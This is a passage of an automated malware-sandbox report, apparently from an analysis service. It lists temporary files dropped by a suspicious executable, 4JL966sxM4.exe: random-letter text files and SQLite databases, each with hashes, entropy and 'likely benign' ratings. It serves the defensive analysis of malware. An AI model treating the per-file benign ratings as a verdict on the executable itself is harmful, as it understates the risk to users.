Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\2bef38851483abae82f1172c1aaa604c\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\4dd0adc78feadb0f3d91c49d0c7e12ee\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2e14a1befe55e7d9ad2457ceb5267e36\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

C:\Users\user\AppData\Local\Temp\tmp109.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\Temp\tmp10A.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698801429970146
Encrypted:	false
SSDEEP:	24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
MD5:	488BC4EF686937916ECE6285266A6075
SHA1:	498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
SHA-256:	8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
SHA-512:	1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

C:\Users\user\AppData\Local\Temp\tmp8DB6.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC3F9.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC41A.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC41B.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC42B.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC42C.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC43D.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2891393435168748
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
MD5:	037D23498B81732EEAAAD0E8015F3F85
SHA1:	E7719865D7717A4B36D85609F3EC25C10934587F
SHA-256:	83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
SHA-512:	BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC44E.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2891393435168748
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
MD5:	037D23498B81732EEAAAD0E8015F3F85
SHA1:	E7719865D7717A4B36D85609F3EC25C10934587F
SHA-256:	83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
SHA-512:	BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC45E.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2891393435168748
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
MD5:	037D23498B81732EEAAAD0E8015F3F85
SHA1:	E7719865D7717A4B36D85609F3EC25C10934587F
SHA-256:	83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
SHA-512:	BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC46F.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2891393435168748
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
MD5:	037D23498B81732EEAAAD0E8015F3F85
SHA1:	E7719865D7717A4B36D85609F3EC25C10934587F
SHA-256:	83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
SHA-512:	BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE4.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690067217069288
Encrypted:	false
SSDEEP:	12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
MD5:	4E32787C3D6F915D3CB360878174E142
SHA1:	57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256:	2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512:	CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious:	false
Preview:	AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

C:\Users\user\AppData\Local\Temp\tmpE5.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.70435191336402
Encrypted:	false
SSDEEP:	24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
MD5:	8C1F71001ABC7FCE68B3F15299553CE7
SHA1:	382285FB69081EB79C936BC4E1BFFC9D4697D881
SHA-256:	DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
SHA-512:	8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
Malicious:	false
Preview:	NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

C:\Users\user\AppData\Local\Temp\tmpF5.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\Temp\tmpF6.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698801429970146
Encrypted:	false
SSDEEP:	24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
MD5:	488BC4EF686937916ECE6285266A6075
SHA1:	498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
SHA-256:	8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
SHA-512:	1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
Malicious:	false
Preview:	ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

C:\Users\user\AppData\Local\Temp\tmpF7.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690067217069288
Encrypted:	false
SSDEEP:	12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
MD5:	4E32787C3D6F915D3CB360878174E142
